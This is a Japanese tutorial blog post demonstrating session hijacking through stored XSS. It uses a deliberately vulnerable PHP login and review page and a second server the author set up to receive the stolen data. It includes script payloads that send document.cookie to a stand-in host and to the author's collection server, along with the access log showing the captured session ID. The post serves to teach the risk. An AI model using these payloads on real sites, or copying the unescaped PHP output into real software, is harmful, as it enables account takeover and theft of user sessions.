LoginSignup
11
8

More than 3 years have passed since last update.

クロスサイトスクリプティングでセッションハイジャックする

Last updated at Posted at 2019-09-12

目的

XSSは危ない!とはよく聞くけど、具体的にどう危ないのかを示す記事が少なかったので。

前提

  • くっそ脆弱なWebアプリケーションを組んで試します。実際はそんなわけないだろうとか、そのへんはゆるして!
  • XSS自体の説明とかは省くので、そのへんもゆるして!

やったこと

お粗末なWebアプリを用意する

お粗末なWebアプリとして、[ログイン画面]→[ようこそ画面兼レビュー投稿画面]みたいな簡単なものを作ります。

サーバ環境を整える

今回はPaizaCloudさんのサービスを利用します。
image.png
PHPだけインストールしておきます。

ログイン画面を作る

できたら、index.phpで簡易なログイン画面を作ります。

index.php
<?php
  echo "<h1>Hello " . "PHP</h1>";
?>

<html>
    <form action="welcome.php" method="post">
        <input type="text" name="username" placeholder="username">
        <input type="password" name="password" placeholder="password">
        <input type="submit" value="login">
    </form>   
</html>

PaizaCloudの左側の「ブラウザ」ボタンをクリックすると内部ブラウザが立ち上がるので、index.phpへのURLを入力してみます。
今回の私の環境だとこんな感じ。
image.png

ログイン後のようこそ画面兼レビュー投稿兼レビュー内容表示画面を作る

とりあえずファイル名はwelcome.phpとしてみます。
デザインもへったくれもありませんが、検証なので許してください。

welcome.php
<?php

session_start();

if((isset($_POST['username']) & isset($_POST['password']))
    && $_POST['username'] != ""){
    $_SESSION['username'] = $_POST['username'];
}

if(isset($_SESSION['username']) && $_SESSION['username'] != ""){
    echo("ようこそ、".$_SESSION['username']."さん");   
?>

<hr>
<h1>レビュー投稿</h1>
<form action="dummy" method="post">
    <textarea rows=5 cols=40></textarea>    
    <input type="submit" value="投稿">
</form>
<h1>レビュー一覧</h1>
<hr>
・ほげほげ
<hr>
・ふがふが
<hr>

<?php
}else{
    echo("先にログインしてください");
}
?>

<br>
<a href="index.php">戻る</a>

処理の流れはこんな感じです。
・セッションを開始する
・リクエストパラメータにusernameとpasswordが設定されているか確認する
・設定されていれば、ユーザ名をセッションに保存する(ユーザ認証などはとりあえず省略)
・セッションにusernameが保存されていれば、「ようこそ◯◯さん」と表示し、レビュー投稿画面と投稿済みレビュー一覧を表示する
・保存されていなければ、「先にログインしてください」と表示する

本当なら、レビュー一覧はDBから拾ってきた値とかにしたかったんですが、面倒だったのでとりあえず静的な情報を表示するのみにしておきます。

これで、ログインできればこんな感じに表示されます。
image.png

ログインできなければ、こんな感じです。
image.png

悪意のあるユーザが不適切な書き込みをしたと想定する

悪いユーザが仮にログインしたとして、悪い書き込みをしたとします。
書き込み内容はこんな感じ。

<script>alert(document.cookie)</script>

本当ならここで実際に書き込みたいところですが、面倒なのでソースを直接編集して、書き込まれた内容が表示されている、という想定でいきます。

welcome.php
<?php

session_start();

if((isset($_POST['username']) & isset($_POST['password']))
    && $_POST['username'] != ""){
    $_SESSION['username'] = $_POST['username'];
}

if(isset($_SESSION['username']) && $_SESSION['username'] != ""){
    echo("ようこそ、".$_SESSION['username']."さん");   
?>

<hr>
<h1>レビュー投稿</h1>
<form action="dummy" method="post">
    <textarea rows=5 cols=40></textarea>    
    <input type="submit" value="投稿">
</form>
<h1>レビュー一覧</h1>
<hr>
・ほげほげ
<hr>
・ふがふが
<hr><script>alert(document.cookie)</script>
<hr>

<?php
}else{
    echo("先にログインしてください");
}
?>

<br>
<a href="index.php">戻る</a>

正常なユーザがログインしてこのページを見た場合、こんな表示になります。
image.png

確かにセッションIDが抜き出されていますが、これを見ているユーザは正常なユーザなので、攻撃者にとってメリットはなく、ただのいたずら止まりです。

では、こうだったらどうでしょう。

<script>
window.location="https://hogehoge.com?"+document.cookie;</script>

このコードは、正常なユーザのクッキー情報を抜き出して、特定のサーバへGETで送信するものです。
このスクリプトが含まれているページを踏んだ瞬間、実行されるイメージです。

実際にやってみたいと思います。

抜き出したクッキー情報を受け取るWebサーバを立てる

今度は、悪い奴が抜き出したクッキー情報を受け取るための悪いWebサーバを作ります。
またもやPaizaCloudで、別アカウントを使って試してみます。
image.png

今度も構成は同じです。
image.png

一応Webサーバは立ったので、不正に取得したクッキー情報をこのWebサーバに、GETで投げるようにしておきます。
この場合はこんな感じになります。

<script>
window.location="https://localhost-bowtin-badguy1.paiza-user.cloud/~ubuntu/index.php?"+document.cookie;</script>

さて、こんなレビューがレビュー一覧に埋め込まれたと想定して、再度脆弱なWebサーバのソースを書き換えます。

welcome.php
<?php

session_start();

if((isset($_POST['username']) & isset($_POST['password']))
    && $_POST['username'] != ""){
    $_SESSION['username'] = $_POST['username'];
}

if(isset($_SESSION['username']) && $_SESSION['username'] != ""){
    echo("ようこそ、".$_SESSION['username']."さん");   
?>

<hr>
<h1>レビュー投稿</h1>
<form action="dummy" method="post">
    <textarea rows=5 cols=40></textarea>    
    <input type="submit" value="投稿">
</form>
<h1>レビュー一覧</h1>
<hr>
・ほげほげ
<hr>
・ふがふが
<hr><script>
window.location="https://localhost-bowtin-badguy1.paiza-user.cloud/~ubuntu/index.php?"+document.cookie;</script>
<hr>

<?php
}else{
    echo("先にログインしてください");
}
?>

<br>
<a href="index.php">戻る</a>

さて、正常なユーザが再度このページを踏んだとします。
ブラウザがスクリプトが見つけて実行するとき、クッキー情報を抜き出して指定したWebサーバにGETで送りつけます。
では、悪い奴が立てたWebサーバのアクセスログを見てみましょう。
image.png

思いっきり来てました。
これでセッションIDが入手できたので、悪いユーザ自身が自分のクッキーを書き換えてリクエストを投げつければ、成り代わることができてしまうというわけであります。
自分のクッキーを書き換えるツールは、Chromeの拡張機能のEditThisCookie等が便利かと思います。

長くなってきたのでまとめに移ります。

まとめ

  • XSSが危ないという話はよく聞くけど、結局何が危ないのか?
  • 例えばセッションハイジャックを行うことができる
  • セッションハイジャックが行われると、そのユーザに成り代わってしまうことができる
  • セッションハイジャックはXSSにおいて起こりうる脅威の一部でしかない
11
8
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
11
8